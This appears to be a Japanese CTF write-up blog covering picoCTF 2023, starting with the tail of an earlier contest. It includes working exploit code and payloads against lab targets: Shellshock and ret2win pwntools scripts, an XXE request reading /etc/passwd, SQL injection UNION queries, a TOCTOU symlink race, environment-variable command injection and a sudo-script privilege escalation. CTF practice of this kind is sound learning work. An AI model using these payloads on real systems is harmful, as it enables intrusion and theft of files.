Staff > flag{gwAZLDpEHAg6}

[Pwn] Parrot (20pts)

僕はオウム。なんでも繰り返し言うよ。

書式文字列攻撃ができる。%1$sから試していって、%7$sでフラグが出た。なんで7なのかは分かってないですが。

__________                             __
\______   \_____ ______________  _____/  |_
 |     ___/\__  \\_  __ \_  __ \/  _ \   __\
 |    |     / __ \|  | \/|  | \(  <_> )  |
 |____|    (____  /__|   |__|   \____/|__|

 You > %7$s
Parrot > DUMMY-FLAG

[Pwn] Shock (20pts)

ショッカーを倒せ!

名前からしてShellShockっぽい。bash_4.3.0があるので確定。Ghidraで開くと丁寧にsetenv()しているので、そこに好きなコマンドを書き込めばよい。 パスが通っていないのでうまいことやる必要がある。今回は2回に分けて実行した。（ls *相当の処理とcat）

from pwn import *

binary_path = './shock'

# remote
context.binary = ELF(binary_path)
# p = process(binary_path)
p = remote('10.10.10.16', 1004)

payload = "() { :; }; echo *"
# > bash_4.3.0 chall flag.txt start.sh
payload = "() { :; }; /bin/cat flag.txt"
# flag{UgjiH6Ep3Xda}

p.sendlineafter('You ', payload)

print(p.recvall().decode('utf-8'))

[Pwn] Noprotect (30pts)

flags 関数呼び出し忘れちゃった。

flags() を呼べば勝ち。リターンアドレスをそこに指定すればよい。 オフセットはがちゃがちゃやってたら出てきました。

from pwn import *

binary_path = './noprotect'

# remote
elf = ELF(binary_path)
context.binary = elf
#p = process(binary_path)
p = remote('10.10.10.15', 1005)
flags = elf.symbols['flags']

payload = b'A' * (256 + 8)
payload += p64(flags)

p.sendlineafter('n0protec >', payload)
print(p.recvall().decode('utf-8'))

※時間ギリギリだったのでフラグがメモに残ってなかった…

解けなかった問題たち

• Crypto: Hash Extension Attack
• NW: Ladder
• Programming: LFSR Period, Grayscale Matrix
• Web: Location

それなりに足掻きましたがダメでした。うーん……ガッツがたりない……

感想

ﾌﾟﾌﾟｰあの人博士号持ってるのにcrypto問全然解けてないじゃないですか（笑）って言われてもぐうの音も出ない結果となりました。精進します。

という文字列を「waniCTF2023に参加した」からコピペしてきました。精進できませんでした。次こそは精進します。

picoCTF 2023に参加し、 5200/9300 points, 306th/6924 でした。今回も手元にメモを取りながら解いたのでwrite-upです。 順番は基本的に取り組んだ順になっていて、特に意味はありません。

chrono

How to automate tasks to run at intervals on linux servers?

何をしたら良いのかわからず、l s-l / したら /challenge ディレクトリがあり、metadata.json があったのでcatしたらフラグが書いてあった。非想定解な気がする…

findme

Help us test the form by submiting the username as test and password as test!

test:test! でログインしてテストに協力してくれ、という感じの問題。ログインするといくつかリダイレクトされて検索フォームのようなものに辿り着く。その際のidパラメータを見るとbase64っぽい値になっている。それらをくっつけてデコードすればよい。

hideme

Every file gets a flag. The SOC analyst saw one image been sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here.

与えられたファイルをstringsで見てみると、secret/flag.png という明らかに怪しいモノが見つかる。が、元の画像のURLをこれに改変するタイプではなかった。 バイナリエディタで眺めると、謎のパターンの繰り返しのあとにPK..が出てくる。50 4B 03 04なのでZIP。オフセットは9B3B=39739なので

dd if=flag.png of=out.zip skip=39739 bs=1

で切り出す。secret/flag.png にフラグが画像で含まれている。

他の人のwrite-upで知りましたが、binwalkを使うのが手っ取り早かったようです。勉強になりました。

HideToSee

How about some hide and seek heh? Look at this image here.

atbashということはわかるものの、何をatbash変換すれば良いのかが分からずに困惑した問題。 青空白猫で開いて見ると、steghideの可能性ありと表示される。するとatbash変換されたフラグ文字列がでてくるので、cyberchefでatbash変換をかければOKだった。

MatchTheRegex

How about trying to match a regular expression

アクセスすると提出フォームらしきモノが置いてある。 ソースを見るとfetchでフラグを取得しようとしているが、ソースコードに「// ^p.....F!?」と書いてある。 どうやらこれにマッチする正規表現を入れれば良いらしいので、入力する値はpicoCTFでOKだった。

money-ware

Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of?

上記ウォレットアドレスを検索すると、これが Petya によるものであるという記事が出てくる。picoCTF{Petya} でよい。

PcapPoisoning

How about some hide and seek heh? Download this file and find the flag.

pcapファイルが提供されるのでwiresharkで開く。 507番目のデータにおもむろにフラグが書いてある。

Permissions

Can you read files in the root file?

これもmetadata.json がそのまま読めてしまって困惑した問題。たぶん読込パーミッションが付いてるから読めるとかそういう意図だった気がする…

ReadMyCert

How about we take you on an adventure on exploring certificate signing requests Take a look at this CSR file here.

CSRが提供される。証明書のCNにフラグが書いてある。

$ openssl req -in readmycert.csr -text -noout | fgrep -i pico
        Subject: CN = picoCTF{read_mycert_3aa80090}, name = ctfPlayer

repetitions

Can you make sense of this file?

6回base64 --decodeするか、CyberChefで6回デコードするとフラグが出てくる。

Reverse

Try reversing this file? Can ya? I forgot the password to this file. Please find it for me?

stringsで見るとズバリ書いてある。

rotation

You will find the flag after decrypting this file

名前からしてROTxxっぽいので、CyberChefに入れてROT13を適用、AmountをいじっていくとROT18でフラグが出てくる。

Rules 2023

Read the rules of the competition and get a little bonus!

飛ばされるページのソースに、altで書いてある。

$ curl https://picoctf.org/competitions/2023-spring-rules.html | fgrep 'picoCTF{'

Safe Opener 2

What can you do with this file? I forgot the key to my safe but this file is supposed to help me with retrieving the lost key. Can you help me unlock my safe?

これもstringsで見ると書いてある。

SOAP

The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?

リクエストを見てみると、XMLでリクエストを送っていることが分かる。のでXXEでLFIできそう。ブラウザが送っているリクエストをbash-cURLでコピーして、ペイロードにXXEを仕込んで送るとIDの部分に/etc/passwdの内容が含まれて返ってくる。

curl 'http://saturn.picoctf.net:59814/data' \
  -H 'Accept: */*' \
  -H 'Accept-Language: ja' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/xml' \
  -H 'DNT: 1' \
  -H 'Origin: http://saturn.picoctf.net:59814' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://saturn.picoctf.net:59814/' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36' \
  --data-raw '<!DOCTYPE data [
<!ENTITY secretData SYSTEM "file:///etc/passwd">
]>
<data><ID>&secretData;</ID></data>' \
  --compressed \
  --insecure

timer

You will find the flag after analysing this apk

apkが提供されるのでとりあえずunzip.

$ fgrep -ir picoCTF *
Binary file classes3.dex matches

$ strings classes3.dex | fgrep picoCTF

useless

There's an interesting script in the user's home directory

uselessコマンドが置いてある。見てみると、manを見ろという記述があるので man useless すると最後の方に書いてある。

Virtual Machine 0

Can you crack this black box? We grabbed this design doc from enemy servers: Download. We know that the rotation of the red axle is input and the rotation of the blue axle is output. The following input gives the flag as output: Download.

Collada形式のオブジェクトが提供される。Blenderで開いて、文字通りブラックボックスの中身を確認すると、赤軸側から、歯数が40-8-8のギアになっている。つまり入力の赤軸を1回転させると出力の青軸が5回転する。

入力は 39722847074734820757600524178581224432297292490103995916782275668358702105 なので、これを5倍して 198614235373674103788002620892906122161486462450519979583911378341793510525 が出力になる。long_to_bytes処理をかける（CyberChefでToBase(16), FromHex)とフラグが得られる。

who is it

Someone just sent you an email claiming to be Google's co-founder Larry Page but you suspect a scam. Can you help us identify whose mail server the email actually originated from? Download the email file here. Flag: picoCTF{FirstnameLastname}

emlファイルが提供される。

Received-SPF: pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) client-ip=173.249.33.206;

の記載があるので、whoisでこのIPアドレスを引くと Person: Wilhelm Zwalina の記載がある。 picoCTF{WilhelmZwalina} でよい。

FindAndOpen

Someone might have hidden the password in the trace file. Find the key to unlock this file. This tracefile might be good to analyze.

暗号化されたflag.zipとdump.pcapが提供される。 pcapを開くと、Ethernet IIのフレームに平文でテキストが書いてある。

• Flying on Ethernet secret: Is this the flag
• iBwaWNvQ1RGe1Could the flag have been splitted?
• AABBHHPJGTFRLKVGhpcyBpcyB0aGUgc2VjcmV0OiBwaWNvQ1RGe1IzNERJTkdfTE9LZF8=
• PBwaWUvQ1RGesabababkjaASKBKSBACVVAVSDDSSSSDSKJBJS
• PBwaWUvQ1RGe1Maybe try checking the other file

AABBのものだけBase64っぽい。Dataの部分だけ(VG以降)見てみるとBase64で展開できる。 This is the secret: picoCTF{R34DING_LOKd_ picoCTF{R34DING_LOKd_ がパスワードで、flag.zipが展開できる。それはちょっとずるいと思った。（フラグっぽい文字列が他のとどう繋がるのかかなり探してしまった）

hijacking

Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we've got the credentials to use on the server. SSH is running on the server.

$ cat .server.py

import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)

pingコマンドを打って、gethostbyaddrしたり色々したりする謎のスクリプトになっている。

sudoでなにができるか確認すると

$ sudo -l
Matching Defaults entries for picoctf on challenge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoctf may run the following commands on challenge:
    (ALL) /usr/bin/vi
    (root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py

/usr/bin/vi がrootで起動できるし、上記のスクリプトをrootで実行することもできることがわかる。 なので、

-response = os.system("ping -c 1 " + ip)
+response = os.system("chmod -R 777 /challenge; echo " + ip)

こうして実行してやれば /challengeに移動してmetadata.jsonを表示できる。

More SQLi

Can you find the flag on this website.

ログインページが表示されるので、適当に入力してみる。

username: unko!
password: UNKO!!!

SQL query: SELECT id FROM users WHERE password = 'UNKO!!!' AND username = 'unko!'

とりあえず user = password = ' OR 1 = 1; -- でログインできる。 すると検索画面のような表示になる。Cityに%を入れると全件出てきて、Algiersと入力するとそのエントリだけ表示される。というわけでLIKEしているっぽい。

A' OR 1 = 1 -- で全件表示できているが、フラグらしきモノは見つからない。

Kampala  Maybe all the tables    +256 720 7705600

というのが怪しい。他の情報を漏らさせたいのでUNIONを使って探していく。

%' UNION SELECT 1, name, 3 FROM sqlite_master where type='table'; --

とすると、hints, more_table というテーブルが存在することが分かる。

%' UNION SELECT 1, sql, 3 FROM sqlite_master where name='more_table'; --
CREATE TABLE more_table (id INTEGER NOT NULL PRIMARY KEY, flag TEXT)

id, flagという2つのカラムがあるようなので、

%' UNION SELECT *, 3 from more_table; --

でflagが得られる。

MSB

This image passes LSB statistical analysis, but we can't help but think there must be something to the visual artifacts present in this image...

青空白猫で開き、ビット抽出→RGBのMSBのみチェック。テキストが表示されるので中にフラグが書いてある。

No way out (not solved)

Put this flag in standard picoCTF format before submitting. If the flag was h1_1m_7h3_f14g submit picoCTF{h1_1m_7h3_f14g} to the platform. Windows game, Mac game

Unity問っぽい。AssetStudioで眺めても見当たらなかった。後回しにしているうちに終わってしまった。 dnSpyを使ってやるのが良かったようです。

tic-tac

Someone created a program to read text files; we think the program reads files with root privileges but apparently it only accepts to read files that are owned by the user running it.

#include <iostream>
#include <fstream>
#include <unistd.h>
#include <sys/stat.h>

int main(int argc, char *argv[]) {
  if (argc != 2) {
    std::cerr << "Usage: " << argv[0] << " <filename>" << std::endl;
    return 1;
  }

  std::string filename = argv[1];
  std::ifstream file(filename);
  struct stat statbuf;

  // Check the file's status information.
  if (stat(filename.c_str(), &statbuf) == -1) {
    std::cerr << "Error: Could not retrieve file information" << std::endl;
    return 1;
  }

  // Check the file's owner.
  if (statbuf.st_uid != getuid()) {
    std::cerr << "Error: you don't own this file" << std::endl;
    return 1;
  }

  // Read the contents of the file.
  if (file.is_open()) {
    std::string line;
    while (getline(file, line)) {
      std::cout << line << std::endl;
    }
  } else {
    std::cerr << "Error: Could not open file" << std::endl;
    return 1;
  }

  return 0;
}

statの結果チェックとgetlineの間にうまく対象ファイルをすげ替えてやることでTOCTOUが成立しそうに見えるので、

#!/bin/bash
while true; do
  rm -f ln.txt
  touch ln.txt
  ln -fs flag.txt ln.txt
done;

しながら

(while true; do ./txtreader ln.txt ; done) 2>&1 | grep -v Error

しておくとそのうち成立してフラグが表示される。

VNE

We've got a binary that can list directories as root, try it out !!

~/bin にstickyなファイルが置いてある。

$ ./bin
Error: SECRET_DIR environment variable is not set

SECRET_DIR を指定すると読み出してくれそう。

$ SECRET_DIR=/root ./bin
Listing the content of /root as root:
flag.txt

試しにセミコロンで区切ってコマンドを書いてやると素直に実行される。

$ SECRET_DIR="-laF /root; cat /root/flag.txt" ./bin
Listing the content of -laF /root; cat /root/flag.txt as root:
total 12
drwx------ 1 root root   22 Mar 16 01:59 ./
drwxr-xr-x 1 root root   51 Mar 19 05:07 ../
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
-rw------- 1 root root   41 Mar 16 01:59 flag.txt
picoCTF{Power_t0_man!pul4t3_3nv_19a6873b}

Invisible WORDs

Do you recognize this cyberpunk baddie? We don't either. AI art generators are all the rage nowadays, which makes it hard to get a reliable known cover image. But we know you'll figure it out. The suspect is believed to be trafficking in classics. That probably won't help crack the stego, but we hope it will give motivation to bring this criminal to justice!

バイナリを眺めると、00が続いたあとにPKが見える。がZIPヘッダーではない…ように見えて、2バイト後に03 04という本来のZIPヘッダーが来る。 オフセットまで読み飛ばしてから、2バイトずつ読んで保存して次の2バイトを読み捨てる処理をPythonで実装。

skip_bytes = 0x8c

with open("output.bmp", "rb") as f:
  f.read(skip_bytes) # skip
  with open("result.zip", "wb") as out:
    bytes_read = f.read(2)
    while bytes_read:
      out.write(bytes_read)
      f.read(2) # skip
      bytes_read = f.read(2)

そのままでは破損したデータとなっているので、修復してから展開する。

$ zip -FF result.zip --out fixed.zip
Fix archive (-FF) - salvage what can
        zip warning: Missing end (EOCDR) signature - either this archive
                     is not readable or the end is damaged
Is this a single-disk archive?  (y/n): y
  Assuming single-disk archive
Scanning for entries...
 copying: ZnJhbmtlbnN0ZWluLXRlc3QudHh0  (169392 bytes)
Central Directory found...
EOCDR found ( 1 169576)...

展開すると ZnJhbmtlbnN0ZWluLXRlc3QudHh0 というテキストファイルが出てきて、その中にフラグが書かれている。

Special

Don't power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized... automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That's Special (TM)

接続すると、独自シェルっぽい何かが動いているように見える。試しにそのままEnterを押すと

Special$
Traceback (most recent call last):
  File "/usr/local/Special.py", line 19, in <module>
    elif cmd[0] == '/':
IndexError: string index out of range

~を送ってみると、シェル文字展開が行われた上で実行しようとしているような挙動に見える。

Special$ ~
~
sh: 1: /home/ctf-player: Permission denied

とりあえずhomeから遡って/bin/lsを呼んでみると、ちゃんと取得できる。

Special$ ~/../../bin/ls /
~/../../bin/ls /
bin   challenge  etc   lib    lib64   media  opt   root  sbin  sys  usr
boot  dev        home  lib32  libx32  mnt    proc  run   srv   tmp  var

homeを見てみると、何かがあるので辿っていくとフラグが置いてある。

Special$ ~/../../bin/ls /home/ctf-player
~/../../bin/ls /home/ctf-player
blargh

Special$ ~/../../../bin/cat /home/ctf-player/blargh
~/../../../bin/cat /home/ctf-player/blargh
/home/ctf-player/../../../bin/cat: /home/ctf-player/blargh: Is a directory

Special$ ~/../../bin/ls /home/ctf-player/blargh
~/../../bin/ls /home/ctf-player/blargh
flag.txt

Special$ ~/../../../bin/cat /home/ctf-player/blargh/flag.txt
~/../../../bin/cat /home/ctf-player/blargh/flag.txt
picoCTF{5p311ch3ck_15_7h3_w0r57_3befb794}

Specialer

Reception of Special has been cool to say the least. That's why we made an exclusive version of Special, called Secure Comprehensive Interface for Affecting Linux Empirically Rad, or just 'Specialer'. With Specialer, we really tried to remove the distractions from using a shell. Yes, we took out spell checker because of everybody's complaining. But we think you will be excited about our new, reduced feature set for keeping you focused on what needs it the most. Please start an instance to test your very own copy of Specialer.

lsなどが封じられているので、組み込みシェルコマンドだけで探し回る。* がカレントフォルダの全ファイルにマッチすることや、readコマンドなどを活用すればよい。

Specialer$ echo *
abra ala sim

Specialer$ cd abra

Specialer$ echo *
cadabra.txt cadaniel.txt

Specialer$ read -rd '' file < cadabra.txt ; echo "$file"
Nothing up my sleeve!

Specialer$ read -rd '' file < cadaniel.txt ; echo "$file"
Yes, I did it! I really did it! I'm a true wizard!

Specialer$ cd ..
Specialer$ cd ala
Specialer$ echo *
kazam.txt mode.txt

Specialer$ read -rd '' file < kazam.txt ; echo "$file"
return 0 picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_a8567b6f}

babygame01

(descはメモし忘れ)

マップとして2700バイト確保されている領域の手前にフラグ変数があり、かつ境界チェックがないので原点(0,0)からさらに戻れる。 スタート地点(4,4)から(0,0)に戻り、さらに4つ左に移動するとフラグ変数が上書きできるので、その後pコマンドでゴールする。

aaaawwwwaaaap

babygame02

(descはメモし忘れ)

win()が0804975dにある。 PIEなし、Stack Canaryなしなのでreturn addressをここに書き換えればwin()が呼べることになる。 Ghidraで眺めたりデバッガを仕込んだりして、move_player()のreturn addressの位置を探すと、マップ領域の-39バイト目にあたることがわかる。 win()は0x0804975d = 5D 97 04 08でreturn addressは0x08049709 = 09 07 04 08 なので、先頭の09を5Dに書き換えればよい。 l<char>というコマンドを使うと、マップのその位置にcharの値を書き込むことができるので、これを使ってreturn addressを書き換える。

move_player()の動作として1バイトしか書き換えられないこと、愚直に原点(0,0)から戻ると途中の領域を破壊してしまうことに注意が必要。 目的の場所の下の行まで移動してからwで上の行にうつり、ピンポイントにその1バイトだけ書き換えればよい。5D = ]なので、l]コマンドで文字を書き換えてから上の行に移ればOK。

…と思ったが、なぜか本番サーバに繋いで実行するとうまくいかない。win()にはNOPが並んでいるので、そこに着地するように他の文字で書き換えてやると通った。理由はよくわからない。。。

wwwwdddddddddddddddddddddddddddddddddddddddddddddddlow

Ready Gladiator 0

Can you make a CoreWars warrior that always loses, no ties? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the

core warsで必ず敗北するプログラムを書け、というもの。 chatGPTに聞いたら無限にぬるぽすれば負けられるらしいのでそのようにする。

;redcode
;name Imp Ex
;assert 1
mov #0, @0
dat #0, #0
end

Ready Gladiator 1

Can you make a CoreWars warrior that wins? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: To get the flag, you must beat the Imp at least once out of the many rounds.

1回は勝てるようにしないといけないらしい。ググるとドワーフが紹介されているのでそれを使わせてもらう。

;redcode
;name dwarf
;assert 1

ADD #4, 3
MOV 2, @2
JMP -2
DAT #0, #0
end

Ready Gladiator 2

Can you make a CoreWars warrior that wins every single round? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this:

今度はもっと勝率を上げないといけないらしい。ググるとImp killerとして下記が紹介されている。

    gate       equ example-10
    example    spl 0,<gate
               dat <gate

two-sum

n1 > n1 + n2 OR n2 > n1 + n2 What two positive numbers can make this possible

n1 > (n1 + n2) を成り立たせるためには、オーバーフローさせてやればよい。

n1 > n1 + n2 OR n2 > n1 + n2
What two positive numbers can make this possible:
2000000000
2000000000
You entered 2000000000 and 2000000000
You have an integer overflow

Java Code Analysis!?! (not solved)

BookShelf Pico, my premium online book-reading service. I believe that my website is super secure. I challenge you to prove me wrong by reading the 'Flag' book!

JWTを使っていて、roleをPATCHで上書きしてやればいけるっぽい。問題はJWSの署名部分で、秘密鍵を入手する必要がある。

ここで面倒になって諦めてしまったが、実際には秘密鍵は平文でハードコードされていた。悲しみ。

UnforgottenBits (not solved)

Download this disk image and find the flag.

第3パーティションがext4で、homeの下に色々と怪しいログがあるっぽいことがわかる。

---     2410     home/yone/Maildir/cur/1673722272.M350117P394146Q2.haynekhtnamet:2,S
---     2362     home/yone/Maildir/cur/1673722272.M376010P394146Q6.haynekhtnamet:2,S

この2ファイルが怪しそうだったが、うまく復元してやれず諦め。

感想

ﾌﾟﾌﾟｰあの人博士号持ってるのにcrypto問全然解けてないじゃないですか（笑）って言われてもぐうの音も出ない結果となりました。精進します。